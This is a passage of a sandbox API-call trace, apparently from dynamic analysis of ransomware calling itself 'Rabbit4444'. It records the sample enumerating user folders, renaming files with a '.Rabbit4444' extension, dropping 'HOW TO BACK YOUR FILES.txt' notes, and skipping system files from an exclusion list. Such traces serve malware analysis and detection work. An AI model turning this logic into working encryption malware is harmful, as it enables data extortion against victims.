0x108f10 [0050.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.254] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14156428856) returned 1 [0050.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.254] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0050.254] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.254] CloseHandle (hObject=0x298) returned 1 [0050.255] CloseHandle (hObject=0x278) returned 1 [0050.255] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\WcVaPByj3hFUdu9J.wav.Rabbit4444") returned 68 [0050.255] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\WcVaPByj3hFUdu9J.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\wcvapbyj3hfudu9j.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\WcVaPByj3hFUdu9J.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\wcvapbyj3hfudu9j.wav.rabbit4444"), dwFlags=0x1) returned 1 [0050.256] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ce6040, ftCreationTime.dwHighDateTime=0x1d4d2ae, ftLastAccessTime.dwLowDateTime=0xa892f090, ftLastAccessTime.dwHighDateTime=0x1d4cf5c, ftLastWriteTime.dwLowDateTime=0xa892f090, ftLastWriteTime.dwHighDateTime=0x1d4cf5c, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YFZqM1OxNBw9.m4a", cAlternateFileName="YFZQM1~1.M4A")) returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2=".") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="..") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="windows") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="bootmgr") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="pagefile.sys") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="boot") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="ids.txt") returned 1 [0050.256] lstrcmpiW (lpString1="YFZqM1OxNBw9.m4a", lpString2="NTUSER.DAT") returned 1 [0050.256] lstrcpyW (in: lpString1=0x130eb82, lpString2="YFZqM1OxNBw9.m4a" | out: lpString1="YFZqM1OxNBw9.m4a") returned="YFZqM1OxNBw9.m4a" [0050.256] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\YFZqM1OxNBw9.m4a", dwFileAttributes=0x0) returned 1 [0050.256] lstrlenW (lpString="YFZqM1OxNBw9.m4a") returned 16 [0050.256] lstrlenW (lpString="Rabbit4444") returned 10 [0050.256] lstrcmpiW (lpString1="OxNBw9.m4a", lpString2="Rabbit4444") returned -1 [0050.256] lstrlenW (lpString=".dll") returned 4 [0050.256] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.256] lstrlenW (lpString=".lnk") returned 4 [0050.256] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.256] lstrlenW (lpString=".ini") returned 4 [0050.256] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.256] lstrlenW (lpString=".sys") returned 4 [0050.256] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\YFZqM1OxNBw9.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\yfzqm1oxnbw9.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.257] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.257] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14156730691) returned 1 [0050.257] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91549) returned 1 [0050.257] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.257] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0050.257] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x168a0, lpName=0x0) returned 0x298 [0050.257] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168a0) returned 0x70000 [0050.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.259] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14157012860) returned 1 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0050.259] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.260] CloseHandle (hObject=0x298) returned 1 [0050.260] CloseHandle (hObject=0x278) returned 1 [0050.261] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\YFZqM1OxNBw9.m4a.Rabbit4444") returned 64 [0050.261] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\YFZqM1OxNBw9.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\yfzqm1oxnbw9.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\YFZqM1OxNBw9.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\yfzqm1oxnbw9.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.261] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ce6040, ftCreationTime.dwHighDateTime=0x1d4d2ae, ftLastAccessTime.dwLowDateTime=0xa892f090, ftLastAccessTime.dwHighDateTime=0x1d4cf5c, ftLastWriteTime.dwLowDateTime=0xa892f090, ftLastWriteTime.dwHighDateTime=0x1d4cf5c, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YFZqM1OxNBw9.m4a", cAlternateFileName="YFZQM1~1.M4A")) returned 0 [0050.262] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0050.262] lstrcpyW (in: lpString1=0x130eb82, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.262] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.262] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.262] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.263] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.263] CloseHandle (hObject=0x278) returned 1 [0050.263] CloseHandle (hObject=0x27c) returned 1 [0050.263] GetCurrentThreadId () returned 0xd98 [0050.263] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0050.263] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Contacts", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0050.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102750 | out: hHeap=0xe0000) returned 1 [0050.264] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0050.264] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Contacts" | out: lpString1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0050.264] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Contacts\\") returned="C:\\Users\\FD1HVy\\Contacts\\" [0050.264] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Contacts\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3" [0050.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\contacts\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.265] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.269] FlushFileBuffers (hFile=0x27c) returned 1 [0050.270] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.270] CloseHandle (hObject=0x27c) returned 1 [0050.270] lstrlenW (lpString="C:\\Users\\FD1HVy\\Contacts") returned 24 [0050.270] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.270] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe74758f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0050.271] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.271] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.271] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.271] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.271] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe74758f8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.271] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.271] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.271] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.271] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.271] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.271] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe74758f8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe74758f8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe749bc95, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.271] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.271] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.271] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0050.271] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0050.271] lstrcpyW (in: lpString1=0x130eb6a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.271] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\desktop.ini", dwFileAttributes=0x22) returned 1 [0050.272] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\desktop.ini", dwFileAttributes=0x6) returned 1 [0050.272] lstrlenW (lpString="desktop.ini") returned 11 [0050.272] lstrlenW (lpString="Rabbit4444") returned 10 [0050.272] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0050.272] lstrlenW (lpString=".dll") returned 4 [0050.272] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.272] lstrlenW (lpString=".lnk") returned 4 [0050.272] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.272] lstrlenW (lpString=".ini") returned 4 [0050.272] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.272] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0050.272] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0050.272] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Contacts\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\contacts\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.273] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.273] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.273] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.273] CloseHandle (hObject=0x278) returned 1 [0050.273] CloseHandle (hObject=0x27c) returned 1 [0050.273] GetCurrentThreadId () returned 0xd98 [0050.273] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6550 [0050.273] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0050.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7878 | out: hHeap=0xe0000) returned 1 [0050.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0050.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0050.274] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0050.274] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3" [0050.274] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.277] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.279] FlushFileBuffers (hFile=0x27c) returned 1 [0050.280] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.282] CloseHandle (hObject=0x27c) returned 1 [0050.282] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData") returned 23 [0050.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe749bc95, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0050.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.282] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.282] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.282] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.282] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe749bc95, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.283] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.283] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.283] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.283] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.283] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe749bc95, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe749bc95, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe749bc95, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.283] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.283] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.283] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="Rabbit4444.exe") returned -1 [0050.283] lstrcmpiW (lpString1="Local", lpString2=".") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="..") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="windows") returned -1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="bootmgr") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="pagefile.sys") returned -1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="boot") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="ids.txt") returned 1 [0050.283] lstrcmpiW (lpString1="Local", lpString2="NTUSER.DAT") returned -1 [0050.283] lstrcpyW (in: lpString1=0x130eb68, lpString2="Local" | out: lpString1="Local") returned="Local" [0050.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0050.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3c) returned 0x1150d8 [0050.283] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf6610 [0050.283] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="Rabbit4444.exe") returned -1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2=".") returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="..") returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="windows") returned -1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="bootmgr") returned 1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="pagefile.sys") returned -1 [0050.283] lstrcmpiW (lpString1="LocalLow", lpString2="boot") returned 1 [0050.284] lstrcmpiW (lpString1="LocalLow", lpString2="ids.txt") returned 1 [0050.284] lstrcmpiW (lpString1="LocalLow", lpString2="NTUSER.DAT") returned -1 [0050.284] lstrcpyW (in: lpString1=0x130eb68, lpString2="LocalLow" | out: lpString1="LocalLow") returned="LocalLow" [0050.284] RtlAllocateHeap (HeapHandle=0xe0000, 